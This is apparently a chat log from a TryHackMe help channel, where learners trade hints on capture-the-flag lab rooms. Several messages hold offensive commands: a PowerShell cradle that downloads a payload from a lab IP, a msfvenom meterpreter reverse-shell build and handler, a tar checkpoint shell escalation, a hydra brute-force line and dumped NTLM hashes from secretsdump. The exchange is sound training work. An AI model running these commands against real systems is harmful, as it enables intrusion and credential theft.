#room-hints

Ok, if you using nmap, like nmap [IP] [IP]. what are you targeting?

the first IP is your own IP and second IP is what?

In which room do you see that?
And what for would you scan your own machine IP ?

Can anyone tell me how can i make the JS file output vertically?

copy paste into a "beautifier", there are many on the internet that you can find by searching "Javascript beautifier"

I meant like in debugger itself

like

Well for one thing that 2nd screenshot is from a different browser, it may have a function yours doesn't. I'm unaware of how to format in Inspect Element, but that tab says "formatted" next to it so it may be a feature of that browser's inspector

Yeah the second is from chrome ig. I think Firefox doesn't have that feature. Thanks anyways

Gave +1 Rep to @tender crystal

I got it this bracket options makes that work 😆

Nice! I just tried it and Chrome has it too

same icon/button

I'm stuck on task 4 question 4 of the NetworkServices room. I believe the issue is using smbclient to read a file with spaces in the file name. Any command I run on the file ends up giving an error on just the first word. If anyone has a nudge for me that would be greatly appreciated.

I actually did and didn't find anything useful yet but will keep looking 😉

I already tried quotes which give an error, using \ isn't correctly escaping anything

It's probably obvious but it's eluding me

Thanks! That worked.

Gave +1 Rep to @burnt rivet

I didn't realize that there could be a difference between the two types of quotes, but that is helpful to know

hello guys i need help on metasploit introduction room

i'm trying to use the exploit but it didn't work for me

do i have to set any other parameter then rhost ?

i think had issue with LHOST i changed

is there a payload that i have to use ?

done

=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

hello, in crack the hash room, the last 2 questions in the level 2 section, do i have to use hashcat for it, or am i able to do it with john, ive tried doing it with john a few ways like salted-sha1, hmac-sha1, dynamic24, dynamic25 (i was and still am desperate) but still no luck.
Done the sha512crypt hash, though I'm still losing brain cells with the last question

I'm in room networkservices2, Task 9 "By default it will test with the "select version()" command, what result does this give you?". The version I get back is not being accepted as correct answer. I also checked here via search and in walkthroughs, and the answer I put in is correct, but it's not being accepted. Any pointer is appreciated.

Giving me "Uh-Oh. Your answer is incorrect." Yes, tried a reload.

i just re-typed the answer again and it's fine now, so yes, must've been. thanks

@lucid junco

can u ping that IP ?

Is that the VM from task 3 or 6?

Silly question, I know.

taskl 6

i cant ping it

then it's not the right VM

see how task 6 has the button active?

when u deploy a machine it fades a little

Task 6 is smpt7

It's the correct VM.

is it offline?

or is the problem on my side

can you try via OPENVPN?

Try reboot the VM

wait

maybe ik what it is

brb

I'm gonna take a guess and say that u have a firewall or VPN active that filters the packets you try to send

I can't ping it either.

had a similar issue when I used a firewall on KDE plasma

If you can't ping it's as if there is no tunnel between your host and the machine you are trying to attack

I'm aware of that, lol

So I booted up my VM, connected to the vpn first.

Then booted up my own and can ping my own.

im still lost

Have you terminated the task machine?

tried to restart it multiple times

The red terminate button?

Or is it not terminating?

it is terminating but it just doesnt work

idk why

Hi guys I'm struggling to remote in to the machine in the windows fundamentals 1 room. I know I've managed to do it in the past but cant for the life of me remember how. I tried to ssh in from the attack box but that didn't seem to work. Any tips? Even a clue so I can find my own way. Thanks

They weren't so much instructions I found as they were just explaining what remote access was. Unless I've totally skimmed over it. I'll have another look. thanks

Ah right ok I'll try that

Yeah I'm gonna look at that again. I did have a quick scan but didn't read it word for word because I was just looking for the instructions but I'll have another read.

@burnt rivet Yeah no that article just explains what RDP is but doesn't provide any info on how to actually connect.

ok cool. Believe it or not I'm actually just finishing up my 2nd year of computer science at Uni but we've not covered this. I know google is a useful tool however. So am I wrong in trying to ssh in from the attack box terminal? I tried that but it didn't work.

I'll try and search for that though. Thanks for your patience.

Ah right

I know nothing about windows tbh because I'v'e always used mac. It becomes problematic at times ha ha

The tool I use for RDPing into a windows target is called “remmina”. Type remmina into your terminal and press enter. Itll ask you to download it and when done put remmina in again. It will launch the tool

Ah cool and do you install that in the attack box or your own machine? I tried that via the attack box but couldn’t open the gui for some reason.

xfreerdp worked for me its very simple

Ah cool I’ll check it out. I presume you just install it on your own machine rather than the attack box?

Yay... once you installed do /usr/bin/xfreerdp -u username -p pass v: ip

Excellent thankyou

Hi. I'm doing the https://tryhackme.com/room/uploadvulns
Upload Vulnerabilities room
I'm at task 8
and I couldn't find the directory to which my files are being uploaded to.
I ran gobuster, and I found out there's /privacy and /assets but I couldn't fine my files there.
I did find out that any file extension aside from .jpeg causes an internal server error (500) so I uploaded a .jpeg file but I can't find it.
I also ran gobuster on the URIs it found before but nothing new...
would like a small hint 🙂

EDIT: any file gets me to ?submit=failure and images files all get me to code error 500 unless it's jpeg and then it's ?submit=failure as well.
I really am out of ideas

on one writeup (thedutchhacker) they uploaded a file .php5 and it was visible in the /privacy directory under a different name. I still see nothing there doing exactly the same.

My own VM, I recommend getting one instead of attackbox

I rebooted both machines and it's now working...

Hello i'm doing https://tryhackme.com/room/nmap04 and i am stuck on task 5

the scp command does nothing

Show a screenshot pls

nm i did a dumb

That's not the full command provided by the room

forgot the .

Thank you for the help

what am i doing wrong here (i already have the flag from the site but cant get it through telnet)

Are you pressing enter 2 times after "host: telnet" ?

Because if you only press 1 time, it's jumping in a newline where you could add another header, and then basically times out

thats what it is thank you

time for a break

Was anyone able to solve this room? https://tryhackme.com/room/btredlinejoxr3d I´m stuck on creating a standard collector in redline and it get´s stuck on creating a new analysis session aswell
is this room or bugged or so?

howdy folks, I'm in the intro to shells room, have the windows VM up. I'm RDPed into it, but I can't seem to get netcat or socat to run...Obviously missing something easy here. How do I run either of those commands? I've tried in powershell and cmd.exe so far.

nvm, just had to run the commands from the directory they're in (C:\Tools)

hey guys

i got the shell but now im trying to get output

there must be a flag instead of root users

whats the problem

hi.
I'm doing this room https://tryhackme.com/room/cyberheroes
and I'm quite at the beginning.
I got to the website and I saw that there's a username and a password in the JS function that is called when I click login
but they didn't work, nor did their reversing string worked.
I'm kinda stuck. gobuster didn't bring much. nmap just the 80 and 22 ports.
Any hints?

Not really experienced with JS but I'll try that. thanks.

Gave +1 Rep to @dusk totem

okay yeah I really should have just read further down the function
thanks!

Gave +1 Rep to @dusk totem

Linux Forensics Task 6 Question 1 broken?

What have you tried, why do you think it's broken?

It worked when I tested it last week 😄

I think you're looking at the wrong users bash history.

question:
what data format is this?
{"company":"The Best Festival Company", "username":"santa"}
I'm doing the https://tryhackme.com/room/learncyberin25days task three.
the answer is 4 characters long.
I tried "dict" but it didn't work. and it seems like a dict to me.

google "data formats in programming" and you should have the answer

hello looking for some thoughts on why hydra might not be working effectively for me. I am trying the Mr Robot room.

it keeps coming back with eroneous results, IE - telling me every password is valid. Could I paste my command here or would that be a spoiler?

||hydra -l Elliot -P fsocity.dic 10.10.27.130 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:The password you enterred for the username Elliot is incorrect." -t 30||

that command just gives me the first 30 results in the dic file. lol

thank you. i will try that!

ok i will have to keep investigating then. Would that have something to do with the expected return or another portion that im missing all together?

ok cool. thats what i wanted. jsut a hint HAHA.. thank you. I'll go reassess in burp.

https://tryhackme.com/room/uploadvulns task 7... I've tried posting image files and php files with various names and extensions, but nothing uploads correctly. Either 302 location: /?submit=failure or 500 error.

To be clear, I modified the filter JS in Burpsuite so the browser does post to the server. In burpsuite I've tried changing the post in various ways but nothing gets accepted.

@toxic glacier You're unable to upload anything to the server? Have you tried first uploading a genuine file (of the whitelisted format) and accessing it before attempting to manipulate the page contents?

I just started a new machine, and used Firefox to upload a genuine PNG. That did succeed. It kept failing on the previous machine.

so now I'll investigate further. Thanks!

no problem! good luck!

It worked out. Don't know what it was but with the fresh machine and a good request to work with in Burp Suite repeater, it worked beautifully.

im in snort -learn how to use snort to detect

task 5... this happened yesterday as well.. anytime i try to run a command, this is the response

and i just started that box and that was the first command

🙂

simply ran the command given and it should be outputting traffic but says the file isnt there

haha also needed sudo

dummy

Hi. doing the room (task 4)https://tryhackme.com/room/networkservices2
I was able to transfer the bash binary to the user at the target machine as you can see in the screen shot. and it has the required privileges (the file) yet when I run it I don't get root shell and remain the user...
any idea what I could have done wrong?

Did I have to do all those actions as a root user?
I just used sudo I thought it'd be same

Sudo chown root:root bash
In the folder where you have that bash executable

@burnt rivet
now it's owned by root but still nothing...
does the file have the right privileges? when I pasted the privileges in the answer it was correct...

oh that's right thank you
forgot the +s

Gave +1 Rep to @burnt rivet

thanks you too

no problem

ok i have finally solved the Mr Robot room. I have one outstanding question tho... Through trying to figure the room out and what to do I decoded some bits out of the ||fsocity.dic|| file that is given and it decoded to a gif89a file. Is this coincidence or is there more to this file that advertised?

(this in NO way helped me actually solve Mr Robot, just thought it was a strange oddity to find with no mention)

Doing the OWASP Top 10 room and i'm on task 16, it's asking me where is falcon's SSH key located in /etc/passwd, what should I be looking out for to find it?

No, that's not what it's asking

is it possible to do privesc if I have sudo on /bin/ls? thanks

So I finished the rick and morty CTF, but is there a way to view the pages that "Only the REAL rick can view"?

thanks bro.

Gave +1 Rep to @quartz stratus

What is the username of who you're logged in as on your deployed Linux machine? - when you run command onn machine ( whoami) he show you ( root) but answer is (tryhackme) . is it mistake or just i am dumb ?:D

Have you connected with SSH to the diployed machine?

run us recommend

oh f. i use THM AttackBox XD

sorry my bad

hello, im in metasploit exploitation, msfvenom section. Ive done a handler and have used over 5/6 payloads, when i try and execute them on the target system I get "Segmentation fault (core dumped)" error on all the payloads ive used, am i using the wrong payloads or incorrectly executing them?

the msfvenom payload and the handler payload option need to be the same

ahh that should help, thanks for that @alpine kestrel

Gave +1 Rep to @alpine kestrel

no problem

Hello people doing network services2 task 3. Don't need a hint really just wondering how long the Nmap scan takes. Been waiting almost an hour

try using -T5 with it

Hi - Doing MetasploitExploit but I cant seem to get past this handler failed

oh god

i had a netcat open in another tab thanks

Gave +1 Rep to @burnt rivet

Thank you

Gave +1 Rep to @deep brook

np

Hi - I'm doing Skynet and I'm working on the flags, I've been assuming from the prev question that I'm looking for rfi, but I don't see anything in searchsploit and nothings jumping out at me in the squirrelmail pages. am I looking in the right places?

yes

Network Services 2 Task4 Exploiting NFS I downloaded the bash file and did the root etc but I can't get the permission to end in sr-x. Mine ends in Sr with no X

yes (I don't know how to black stuff out, so I'm trying not to be specific)

thanks! ||i found the samba password, but I didn't see how that got me to the flags||

Gave +1 Rep to @burnt rivet

||i logged into milesdyson with them and got the name of the hidden directory||

||i logged into milesdyson with them and got the name of the hidden directory||

@burnt rivet I tried + the corresponding letter in caps and in common. No diff

Unless I'm not understanding what the link means

😢

Finally understood your hint

Thanks

thank you!

Gave +1 Rep to @burnt rivet

the smtp room is kicking my ass. i guess this is where i take a break

brain is done for

-_-

i think i need to do that metasploit room

Hello i am trying todo https://tryhackme.com/room/linprivesc task 9 "cronjobs"
and i can't seem to get this to work

chmod +x <filename>

okay that has worked but why?

is it because there is no schedule?

this makes the file executable

okay noted thank you for you time

Happy hacking!

I am having a hard time with Security Operations Task 3 in building a firewall

i had the same confusion... you just have to block all traffic coming to the router. its more than 1 IP address.

How do you get the .RUN command to work? It doesn't work in my Attack box at all

Gave +1 Rep to @burnt rivet

In the security analyst path, enumerating telnet isn't working correctly in my opinion. I have completed it, but only from google searching. Port 8012 doesn't come up because there at 8 ports open and none of them are 8012.
Following up with Exploiting Telnet is even worse. Starting the tcpdump worked, however .RUN says No Command Found.

This is the question as it is written: 'Now, use the command "ping [local THM ip] -c 1" through the telnet session to see if we're able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)'

you need to scan all ports with nmap for it to show up.... then when you know that port is open you need to use -sV to do versioning and figure out what the port is used for

Thanks @alpine kestrel

Gave +1 Rep to @alpine kestrel

then start tcpdump on the attackbox.... after that do .RUN ping 10.10.x.x -c 1 in the telnet instance and you should see the result

might not work if you use your own attacking vm instead of the attackbox for weird reasons

I did and I get the error .RUN: No Command Found

@burnt rivet That's completely possible 😄

@burnt rivet It wasn't giving me a target machine

@burnt rivet I read them over and over, trust me. I used "start machine" but the only machine that started up and gave me an IP was the Attackbox

I'm aware there are 2 buttons

Yes, thank you. I started both and had the same error. However, I'll refresh and start over to see if I get different results. Appreciate the help!

@burnt rivet just to show you, this is the target IP and .RUN doesn't work

headdesk

common mistake right there

It doesn't say where to run it, tho. So how am I missing something that isn't stated?

I'm not looking at the online writeups. I am going through the learning and I just did enumerating SMB. I'm sorry people find mistakes funny, but I thought we were here to learn.

That was yesterday and then I've come back to redo the material again. I go through everything multiple times since I'm trying to advance my career in I.T.
Sorry, I misread an above message where someone laughed and said "common mistake". I realize now it wasn't directed towards this discussion. I apologize for my oversight.

Have you done that step already: "Okay, let's try and connect to this telnet port! If you get stuck, have a look at the syntax for connecting outlined above." ?

@left thunder Yes I did. It's fine. I'll just start over from the beginning of this Network Services module and try again.

Okay, just so you know, this machine is sometimes a bit finicky, so I wanted to make sure that it's not an understanding issue, or if simply the target machine has been buggy for you to try the ping command as you did in the screenshot above.

@left thunder Thank you for understanding. I am a little frustrated because this will be my 4th attempt this morning. I am hoping I'm about to catch something I missed. 5th times the charm lol

Gave +1 Rep to @left thunder

If it's still not working this time, come back here

Just to ensure I'm correct in my commands for the Enumerating Telnet, the first question asks How many ports are open? I should be getting this info via: sudo nmap [target ip] -p
Is this correct?

It would be -p- but yes

Read the man and info pages a bit closer to understand how nuances of specifying a port range

Ok, and when I run that it shows 3 open ports but none of them are 8012. I only know this because I searched for a write up. Then I performed a search for the port 8012 and it shows as closed. This is where the trouble starts @left thunder

If it's showing 3 open ports, you are very likely on the wrong target machine

But that's the iP for my target machine that it gives me. Not the attack box

What's the title of your target machine in the "active machine information" box that's looking like that:

polosmb3

That's the target machine from task 3, you have to terminate that and start the new target machine in task 6

Right but I started the module over because when I start from task 6 I got told to go back and enumerate

Sure, for task 3 to 5 you need the target machine that you can start in task 3, but since you are at task 6 now, you need the new target machine

I'm sorry I just checked - I'm in task 6

I'll restart the machine again

Ye, let me know the title of the machine then pls

Anyone have any idea how long the OWASP Juice Shop password bruteforce should take?

question about the Linux Strength Training room. I am trying to use the gpg command to decrypt files and i keep getting permissions errors.

Errors:
|| gpg: keybox '/home/sarah/.gnupg/pubring.kbx' created
gpg: WARNING: no command supplied. Trying to guess what you mean ...
gpg: AES256 encrypted data
gpg: problem with the agent: Permission denied
gpg: encrypted with 1 passphrase
gpg: decryption failed: No secret key
||

What am i missing here? There is no way to put in a password/key according to the gpg --help option. Thank you!

do u need sudo?

Hey guys, I’m currently working through the network services room and am on task 8 enumerating telnet. It asks you to do a port scan however when I do it’s taking ages and although I keep returning to the computer the machine keeps terminating or the attack box keeps disconnecting. Is there a quicker port scan I can do? So far -sT and -sS have returned nothing useful -sV was taking ages and I tried just nmap -p- also

Nothing because I disconnected before it completed. Was estimating on it was going to take like 3 hrs or something.

Everytime I checked the estimation got bigger

Wait 10 mins before trying to scan the machine, this machine seems to be a bit slow with starting up.
Also you can try adding -T4 --min-rate 10000 to your nmap command.
Beside all of that, show a screenshot.
You will have to verify first in order to do so

!docs verify

Ah excellent I’ll try that thanks

-T4 definitely it Ely seems to be doing the trick. Scans running much faster

It Ely was a typo btw lol

I'm currently in the "Relevant" room. I've never dealt with python before but an error comes up with :

File "42315.py", line 2, in <module> from impacket import smb, smbconnection ImportError: No module named impacket

I don't know if there's a pip package called 'impacket' or if that's what it's trying to tell me.

Please bare with me. I am completely brand new to everything.
I'm 34 years old and just started learning all of this in February of this year, lol.

whatever <module> is... i'm guessing that's some kind of library for python to use.

and I've used pip maybe twice since February...

I find Information about the module but i'm not sure how to install it, other than source code (which I have no clue how to use, or where to put it)

Code frightens me

you could just google that error "ImportError: No module named impacket"
but yeh it's telling you to install a pip module pip install impacket

Awesome. I was hoping it'd be that simple 💜

I think I installed it as root or something. There's a conflict in what they're both telling me

Pip says it's there, python says 'no'

are you on the attackbox or your own machine

My own machine, Kali

Python 1 and 3 have syntax errors with the script

Python 2 reads it fine, seems like, but can't find impacket

yeh, if you're running the script with python2, you'll have to use pip2
similarly pip3 for python3

I don't know if there's errors with those, it says "timeout" and gives multiple lines

I assume that it means bad syntax

I see

Oh my

👀

Bury me.

Unknown distro options: "extras_requires and install_requires"

Are those other modules?

do you see a requirements.txt by any chance?

I'm not sure where those would be

in the directory where your script is

they make the modules easier to install with just a
pip install -r requirements.txt

No, I just downloaded a script for a cve

can you share the link for the script

Got it from searchsploit: eternal blue

It's proving to be more complex than I thought, not using metasploit and doing everything manually

Guess I'm not ready for the OSCP haha....

42031.py?

42315

God my folders a mess now

yeh, the no msf/sqlmap part would suck I guess

Yeah, I'm trying...

Obviously my knowledge is too limited for this, yet

I've been doing easy boxes for months now. You'd think I'd have this locked in

I don't know what I messed up with pip and python.

It seems to be missing a lot of important stuff

yep, dependency hell is very common

I have a "pycache" in my notes folder now, whoops...

No clue

did you try using a virtualenv?

Lol yeah..

No and I'm not sure how

yeh, it's to separate different versions of packages and modules

so they don't break each other

⚰️

pretty simple stuff imo

I hope that I don't need a fresh box

Reinstall... I don't think I'm able to pick through everything and remove it all to start fresh

I do that a lot

yeh, I've got the script work locally

Wtf

👀

Virtual environments are definitely the 'right' way to manage pip installed modules

I don't understand programs.
I have googled but it's above my understanding

I will keep that in mind

often, different pip packages will have conflicting dependency versions. And you will hate life trying to detangle that dumpster fire. Just use a venv for each 'project' you want a py interpreter for

I got the same result, but it's still missing the module.. and other modules, apparently

Yeah, I have wondered why I'm having these many issues with it...

I'll definitely look into virtual environments

I'm probably gonna have to start with a fresh vm... Damnit

And there is a huge difference between py2 and py3. Learn to differentiate between them, and either migrate a py2 script to 3, or learn to manage a py2 environment alongside your typical py3 environments.

I literally have zero knowledge of anything IT related. I don't understand any of the documentation for these programming languages or what they do.

I didn't know what a library was until about 3 months ago

Google only helps me with CVE lookup lol... I'm in over my head with using python.

Not sure if I need to learn the language or....

Get yourself a python book and get some basic knowledge down. It will go a long way when you get to more advanced stuff.

I know a bit of the language. I'm talking "Day 1" knowledge.

No idea how this pip stuff works tho

https://docs.python.org/3/tutorial/venv.html
https://pip.pypa.io/en/stable/cli/

Barely a script kiddie. "Script fetus"

these should set you right if you spend some time with them

I'll have to reinstall my VM first, to avoid any more conflicts but I will definitely research this. Thank you for the pointer

I'm still relatively new to python as well. Happy to help.

I just don't know how I broke something I've never messed with

Thanks, as always. 🙂

Gave +1 Rep to @burnt rivet

I don't want to wipe this thing...

All my notes

It'll be easier and less messy to just nuke it most likely. It'll give you a fresh starting point again. Save your notes somewhere online.

I say this as someone who did the same thing...

I think I've hit the point where I'm not sure if I'm able to really do this

I want to but I feel like I'm starting way too late

Sorry if this is not within the scope of the channel

when i first started doing these rooms... I felt like I was constantly watching youtube vids or asking ppl in threads for help.. I still do ask for help but I really don't use the videos anymore. Make this your passion, sit back and watch your knowledge grow.

It's something I've always wanted but never knew how.

I never knew how to start. I'm 34 and just about to start my first IT job

It's never too late for anything, it's more of an excuse to work harder for it.
The Nike slogan is very right for many life situations, JUST DO IT.

Don't let your dreams be dreams

im in crack the hash

for some reason its not letting me post pics on here... but i have a text file with the hash $2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom and when i run cat hash.txt it only outputs y2
any idea on this?

? Any help guys. Storing a hash in a txt file and when I cat it just shows y2

For the first part
You need to verify yourself to post pics

!docs verify

In File Inclusion room task 4. What am I doing wrong? The hint says to enter invalid input and check the error messages. What message?

The only 8 character word in the error message is function, and that is not the correct answer.

Do you see it on the screenshot I posted?

Thanks.

Gave +1 Rep to @dusk totem

crack the hash here is the hash i am storing

but when i cat hash.txt, it only outputs y2

and im not able to use hashcat on it

seems to have have a host machine problem, i am able to cat it now after i restarted machine

see if i can crack the hash now

a simple try of using hashcat on my host machine

here is the command on my computer

and its been hanging like this for minutes

the hash is 5f4dcc3b5aa765d61d8327deb882cf99 and i have it stored in hash1.txt

and i also have rockyou.txt in the same folder

this might be a hint

downloading cuda sdk toolkit as we speak and seeing if that will help

Hi,
i did "year of the rabbit". I would like to know how you found the CVE-2019-14287

Linpeas told me there is something but the link is not working
└─$ grep -ri Sudo linpeas.txt
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.10p3

I just want to understand the way you verified vuln for sudo
searchsploit did not show CVE-2019-14287

┌──(kali㉿kali)-[~/tryhackme/raz0rblack/nfs_user_directory]
└─$ searchsploit Sudo -w | grep 47502
sudo 1.8.27 - Security Bypass | https://www.exploit-db.com/exploits/47502

so you just used searchsploit and read the result carefully 🙂

i feel dumb

thank you

like me after i miss read searchsploit... but i took me a while to finally find it (i read a walkthrough which is not glorious)
that's why i'm interrested to know how you did 🙂

Ok, this is hella awkward, but I don't remember the login info for the linux fundimentals1 room... can someone point me in the right direction to find it?

I just need the VM login stuff.

It should automatically log you in

it did not...

:/

Can you share a screenshot of what you see please?

!docs verify

to send pics ^

Have you started this VM via the green button?

I did.

I'll try resetting the vm

Sure

A screenshot of what you see would be very useful though (:

Ah

it's a yikes. Resetting vm now

It is that problem

I did something stupid easy, way too wrong?

No no, bare with me. It is a bit of a rare occurrence on our side -- not your fault

😮

Are you familiar with loging in via SSH by any chance?

I've done it a few times, but I never memorized the code

The vm is restarting now. Once it's up, I'll let you know

Well, the turning it on and off worked

lol

Oh it did?

yeah

You're in the VM okay?

ah perfect

okay

that's an odd one

Thank you though 😄

I've raised it anyway

Weird shit happens with me.

I'm wiccan

😄

Let us know if it happens again (after terminating and re-deploying the machine)

it's a very weird and specific bug

Wait

I think I know the issue.

On the off chance I opened an attack box at the same time I opened the VM, would that force the VM to not login properly?

Since the program would assume I'm finding my way in?

Nah, that should be okay

oh ok

how do i connect to a machine using rdp for the https://tryhackme.com/room/winprivesc

xfreerdp /u:user /p:password /cert:ignore /v:targetip

i found it

Does anyone know the "alternative" path in the Relevant room?

I think I might be on the right track, or it's just another red herring.

I dunno... My nmap says one thing but the python "checker" is saying otherwise. [wink, wink].

It's Windows Server 2016, if that makes it more clear.

Just a "Yae or Nae", or some small hint?

And this exploit "was big news back in the day, developed by a govt agency and then leaked"

Am I on the right track, at least?

Metasploit scanner says that it's vulnerable. Nmap says it's vulnerable

"If it walks like a duck and quacks like a duck..."

An alternative path to the BLUE room in THM is that you can exploit the RDP directly since it is an old windows server and completely bypass all the SMB. try to rund both exploits from armitage under exploit/windows/rdp and it should give you a meterpreter, and make an admin shell in wich u can type net users Adminstrator "your pass" then net users Administrator /active:yes and get the root hash!

unless it requires batteries, then you've got the wrong abstraction

Windows logs a bunch of things. Some of them are even helpful, IIRC

Hi guys

anyone a hint, what codename could mean

in the message you got there the codename is R

Sometimes I feel like I need to back and play Monkey Island to get into the mindset of some of these rooms.

hmm

Hello everybody i'm in linprivesc room i'm doing the task 5 (privilege escalation kernel exploits) i've found a good exploit but i cant send the exploit into the machine using wget. Does anyone could help me ?Thx ❤️

y sure

oh for real ? how can we ssh if there isnt internet access ?

But thx for this information

Gave +1 Rep to @burnt rivet

okey bro ! but how should i download exploit (or any file) if there isn't internet acces ?

https://tryhackme.com/room/linuxfundamentalspart3 - task 4 gives you ways/utilities to transfer files to target machines

hi, i'm doing razorback.
i extracted the hashes from ntds and system.hive but and trying them against lvetrova user though smb
I wonder why it works as the hashes from ntds and system do not contain user vetrova (i used grep to see if there is a hash for that user). did i miss something ?

┌──(kali㉿kali)-[~/tryhackme/raz0rblack/smb_trash]
└─$ impacket-secretsdump -system system.hive -ntds ntds.dit LOCAL > pass_hash.txt

┌──(kali㉿kali)-[~/tryhackme/raz0rblack/smb_trash]
└─$ grep -ri vetrova pass_hash.txt

the working hash is for n.cox user no ???
┌──(kali㉿kali)-[~/tryhackme/raz0rblack/smb_trash]
└─$ grep -ri 16c431d pass_hash.txt
RAZ0RBLACK\n.cox:4612:aad3b435b51404eeaad3b435b51404ee:f220d3988deb3f516c73f40ee16c431d:::

I don't remember seeing a "n.cox" user, I dumped the hashes from the SAM and SYSTEM hives, they give you the administrator hash

┌──(kali㉿kali)-[~/tryhackme/raz0rblack/smb_trash]
└─$ wc pass_hash.txt
6672 6709 554217 pass_hash.txt

do you have the same result ?

nope

I used the sam and system hives

you got the SAM and SYSTEM in the SMB trash, no ?

I don't remember how I got 'em but that's what I used when I did the room

OK
in the hashes i got this line
RAZ0RBLACK\n.cox:4612:aad3b435b51404eeaad3b435b51404ee:f220d3988deb3f516c73f40ee16c431d:::

n.cox is the user no ?

I don't have that user in my notes, I don't think that's a valid user

it comes from : impacket-secretsdump -system system.hive -ntds ntds.dit LOCAL > pass_hash.txt
so this user is in the file, no ? i really do not undertand why using this hash works for lvetrova user

i have a working solution but do not understand it. it makes me mad 😛

Can you you see the Sam file anywhere

https://file.io/n3pJqEzvIWTg

You can verify to send images etc.

!docs verify

aahh 😦

file deleted

?

wtf

maybe they don't allow system passwords/hashes and stuff

https://file.io/2Vpfjh61FyUL

there is the zip

do you still have the password ?

I've got the extracted folder already :)

oh these ones

i'm reading some walkthrough and people always do "cat hashes | cut -d ':' -f 4". So they did not care of users

yeh, sorry kind of a spoiler, you find different ones later

yeh, it's password reuse

ohhh again !!!

that's saying cut(separate) with colons and give me the fourth field(column) that I see from the output

second i was stucked in that room because of password reuse

yes i know
my first though was to grep for vetrova user and get the right hash. is it dumb ?

nah,

then i bruteforce with all hashes and it worked but i did know why

just needs a little more oomph(effort)

grrrr, i was also stuck in the second step (SMB access) because i did not verify found password againt all users

yeh, crackmapexec does a good job at password spraying

thank you for the explanantion, i was going mad 🙂
can i give you a point in the room ?

Ah not sure what you mean by point in the room

i saw that kind of message

🚨 Robocop 🚨
BOT
—
Today at 12:16 AM
Gave +1 Rep to @burnt rivet

oh yeh, just do thanks @vernal roost

do not know if there is a ranking for good chat member

Gave +1 Rep to @vernal roost

it's pretty useless ngl

thanls @cedar anvil

but virtual internet points

thanks @cedar anvil

Gave +1 Rep to @cedar anvil

ok, but it is all i can do for you

hi, i'm a bit stuck on task 2 obtaining meterpreter shell in the alfred room...not able to get the reverse shell to execute...despite getting a 200 code from the python web server i'm seeing an ampersand error in the Jenkins console...`C:\Program Files (x86)\Jenkins\workspace\project>powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.57.72:8000/alfred.exe')
Invoke-Expression : Ampersand not allowed. The & operator is reserved for futur
e use; use "&" to pass ampersand as a string.
At line:1 char:4

• iex <<<< (New-Object Net.WebClient).DownloadString('http://10.10.57.72:8000/
  alfred.exe')
  • CategoryInfo : ParserError: (:) [Invoke-Expression], ParseExcep
    tion
  • FullyQualifiedErrorId : AmpersandNotAllowed,Microsoft.PowerShell.Command
    s.InvokeExpressionCommand`

Hi all, Im having trouble in Windows Fundamentals 1. One of the questions is:
Besides Clock and Network, what other icon is visible in the Notification Area?

I ve put in a lot of different things, not sure exactly what it is looking for

There is a link to a brief description of the Notification Area, did you check that out ?

Yes I've been looking through there now

this is what mind shows:

nvm cant upload an image

You have to verify first in order to be able to

!docs verify

thanks

I dont have any hidden icons

The icon in question is not hidden, it's right there

But I was struggling with that too, that's why I refereed you to the brief documentation, that should easily give you the answer.

Ill read through again

Could you let me have the full URL of the page you are currently on and trying to find the answer?
So the one currently in your URL bar, not the one linked in the task

https://support.microsoft.com/en-us/windows/customize-the-taskbar-notification-area-e159e8d2-9ac5-b2bd-61c5-bb63c1d437c3#WindowsVersion=Windows_10

Alright, ye then as mentioned, should be easily found 🙂

https://tenor.com/view/its-right-in-front-of-you-man-rich-slaton-just-in-front-of-you-its-just-right-in-front-of-you-there-are-right-in-front-of-you-gif-18994494

I will persevere

okay I got it. Thank you for your patience

You're downloading an exe, which you're not meant to do

After creating this payload, download it to the machine using the same method in the previous step:

powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"

Notice that command is very different to what you entered

Hi I try to use whois for facebook.com and for other domains except that on the terminal it tells me that the network is inaccessible is that normal ?

On the room it is not to mark that it is necessary to subscribe

it's marked that the room is free

I already answered this

The attackbox does not have internet unless you subscribe

You can complete the room without subscribing, you just cannot use the attackbox for it

ok bv

The instructions do say use the same method as in the previous step.

Similar. It provides the example. It's still using Powershell's invoke web request verb, but in a different way. That's what it means by the same. It doesn't mean the exact same.

Is it possible to chain metasploit commands as in: use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 10.10.13.236 set LPORT 7000 run The above doesn't seem to work when entered in the msfconsole however, the instructions present it as if it was one command line

got it, i'll try the given example again, it did not work previously either

still not working for me

my msfvenom command: msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.10.13.236 LPORT=7000 -f exe -o alfred.exe

still not working for me

my msfvenom command: msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.10.13.236 LPORT=7000 -f exe -o alfred.exe

my listener: `msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.13.236
LHOST => 10.10.13.236
msf5 exploit(multi/handler) > set LPORT 7000
LPORT => 7000
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.13.236:7000
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] run: Interrupted
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.13.236:7000`

I'm only seeing about half of what you're doing

I'm also heading out now, sorry

Hi guys

i downloaded linpeas.sh

on my system and want to transfer it to the target system

i started a simple http server on my system in the directory where linpeas.sh is

how can i get the file from my target system

this only downloaded the index.html

Hi guys

doing this room now

and im on the last question, where i need to use priviliges escalation

tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

i get this

anyone familiar how to solce the last question?

Windows Fundamental 2 may I have a hint for the Task 7 first question. It said system configuration but the theorie is about cmd ???

nevermind I found the problem xD

hello

i cannot login with ssh

i need help

